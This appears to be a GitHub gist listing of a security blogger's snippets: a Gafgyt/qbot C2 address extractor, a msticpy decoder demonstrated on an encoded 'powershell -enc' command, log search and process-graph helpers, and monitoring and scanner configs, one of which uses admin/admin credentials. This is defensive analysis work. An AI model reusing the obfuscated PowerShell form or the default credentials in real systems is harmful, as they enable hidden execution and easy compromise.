@BoredHackerBlog
BoredHackerBlog / extractor.py
Created July 23, 2022 23:22
Gafgyt/qbot c2 extractor
#Gafgyt/qbot C2 extractor
#https://bazaar.abuse.ch/browse/signature/Gafgyt/
#The file needs to be unpacked (usually packed with upx)
import re
import sys
# regex from https://www.oreilly.com/library/view/regular-expressions-cookbook/9780596802837/ch07s16.html
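# One dotted-quad octet (0-255), captured so the caller can reassemble the
# address from the match groups.
_OCTET = rb"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"
# "a.b.c.d:port" followed by the string's NUL terminator. Raw bytes keep `\.`
# and `\d` out of Python's escape processing (non-raw `b"\."` is an invalid
# escape and only survives with a warning); the terminating NUL is a real
# 0x00 byte so the pattern value stays identical to the original literal.
# The port is only bounded to at most five digits: an empty port and values
# above 65535 both still match, so callers should validate it if needed.
_ADDR_PORT = (
    _OCTET + rb"\." + _OCTET + rb"\." + _OCTET + rb"\." + _OCTET
    + rb":(\d{0,5})" + b"\x00"
)
# Address preceded by a NUL byte (presumably the previous string's terminator).
ipv4_zero = b"\x00" + _ADDR_PORT
# Address preceded by the byte 0xE9 instead of a NUL.
ipv4_e9 = b"\xe9" + _ADDR_PORT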
@BoredHackerBlog
BoredHackerBlog / msticpy_b64_unpack.py
Last active May 17, 2022 01:46
base64 command line arg decoding with msticpy
from msticpy.nbtools import *
from msticpy.sectools import *
# Command line under inspection; the argument after -enc is the base64 blob
# that msticpy's unpacker is expected to find and decode.
command = "powershell -enc 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"
# base64.unpack() returns an indexable result; element 1 is subscripted by
# the 'decoded_string' key and then by position (presumably a DataFrame
# column holding one decoded value per detected blob - confirm against msticpy).
unpacked = base64.unpack(command)
decoded_strings = unpacked[1]['decoded_string']
print(decoded_strings[0])
# it should print
@BoredHackerBlog
BoredHackerBlog / pyspark_search.py
Last active April 30, 2022 01:58
apache spark / pyspark eve.json search
In [1]: from pyspark.sql import SparkSession
In [2]: spark = SparkSession \
...: .builder \
...: .appName("example") \
...: .getOrCreate()
22/04/29 18:55:18 WARN Utils: Your hostname, ubuntu resolves to a loopback address: 127.0.1.1; using 192.168.95.155 instead (on interface ens33)
22/04/29 18:55:18 WARN Utils: Set SPARK_LOCAL_IP if you need to bind to another address
Using Spark's default log4j profile: org/apache/spark/log4j-defaults.properties
Setting default log level to "WARN".
@BoredHackerBlog
BoredHackerBlog / graph_proc.py
Created February 1, 2022 14:49
process graph using graphviz and python
from graphviz import Digraph
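# Sample process tree used to exercise graph_process(): one record per
# process, linked parent->child through "ppid" -> "pid"; "path" serves as the
# node label. pid "204" is the root of this sample (its ppid "0" has no record).
# A single literal replaces the original append-per-row construction.
process_data = [
    {"pid": "1", "ppid": "204", "path": "c:/cmd.exe"},
    {"pid": "4", "ppid": "204", "path": "c:/powershell.exe"},
    {"pid": "204", "ppid": "0", "path": "c:/svhost.exe"},
    {"pid": "8", "ppid": "4", "path": "c:/net.exe"},
    {"pid": "10", "ppid": "4", "path": "c:/netsh.exe"},
]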
def graph_process(jsonarray, pid_key, ppid_key, label_key):
@BoredHackerBlog
BoredHackerBlog / ghactions_docker_build.yaml
Last active February 1, 2022 03:18
github actions for docker containers
name: build and upload container
on:
push:
branches: [ main ]
jobs:
build:
runs-on: ubuntu-latest
@BoredHackerBlog
BoredHackerBlog / set_token.py
Created January 23, 2022 19:30
humio stdin testing
import requests
from time import sleep
while True:
try:
if requests.get("http://localhost:8080").status_code == 200:
break
else:
sleep(5)
except:
@BoredHackerBlog
BoredHackerBlog / docker-compose.yaml
Created January 9, 2022 19:31
openvas docker-compose
#taken from here: https://github.com/immauss/openvas/blob/master/compose/docker-compose.yml
#as of jan 9th 2022, it works fine. takes some time to download feeds initially.
version: "3"
services:
openvas:
ports:
- "8080:9392"
environment:
- "PASSWORD=admin"
- "USERNAME=admin"
@BoredHackerBlog
BoredHackerBlog / alert_app.py
Created September 18, 2021 23:00
humio to og alert
import os

from flask import Flask
from flask import request
import opsgenie_sdk
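app = Flask(__name__)

# OpsGenie client setup. The API key is read from the environment rather than
# hard-coded: the original assigned an empty string here that had to be filled
# in by editing the source, which makes it easy to commit a live key by
# accident. OPSGENIE_API_KEY is the variable name chosen here; the empty
# default preserves the previous (unset-key) behaviour when it is absent.
og = opsgenie_sdk.configuration.Configuration()
og.api_key['Authorization'] = os.environ.get("OPSGENIE_API_KEY", "")
og.api_client = opsgenie_sdk.api_client.ApiClient(configuration=og)
og.alert_api = opsgenie_sdk.AlertApi(api_client=og.api_client)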
@BoredHackerBlog
BoredHackerBlog / 01-netcfg.yaml
Created September 12, 2021 02:34
netplan config for bridge, br0 can be used to sniff traffic between eth1, eth2
# root@host:~# cat /etc/netplan/01-netcfg.yaml
network:
version: 2
renderer: networkd
ethernets:
eth0:
dhcp4: yes
eth1:
dhcp4: no
eth2:
version: '2'
services:
elasticsearch:
image: 'elasticsearch:7.11.1'
environment:
- http.host=0.0.0.0
- discovery.type=single-node
- script.allowed_types=inline
- thread_pool.search.queue_size=100000
- thread_pool.write.queue_size=10000